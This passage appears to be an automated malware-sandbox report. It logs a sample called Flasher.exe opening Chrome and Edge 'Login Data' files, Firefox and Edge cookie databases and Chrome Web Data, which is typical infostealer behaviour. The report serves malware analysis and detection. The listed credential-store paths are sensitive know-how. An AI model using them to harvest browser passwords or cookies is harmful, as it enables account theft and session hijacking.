                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SharedStorage\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\InterestGroups-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOG\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCK\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13340886879273065\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOCK\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOCK\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOCK\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pb\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\MANIFEST-000001\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_3\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregation-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\CURRENT\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\CURRENT\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Favicons-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPS-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteData-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG.old\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOCK\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\MANIFEST-000001\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferredApps\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_3\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\CURRENT\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.old\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOCK\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\CURRENT\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOG.old\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DIPS\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\CURRENT\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PrivateAggregation\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.old\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOCK\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\MANIFEST-000001\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13340886879173047\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action Predictor-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\LOG\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOG\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCK\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000001\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.old\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOCK\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\CURRENT\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOG.old\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\InterestGroups\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOCK\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_2\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG.old\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\MANIFEST-000001\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\index\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.old\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOCK\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOCK\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL-journal\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13340886963423997\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust Tokens\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCK\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\NetworkDataMigrated\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Flasher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal\Login DataJump to behavior
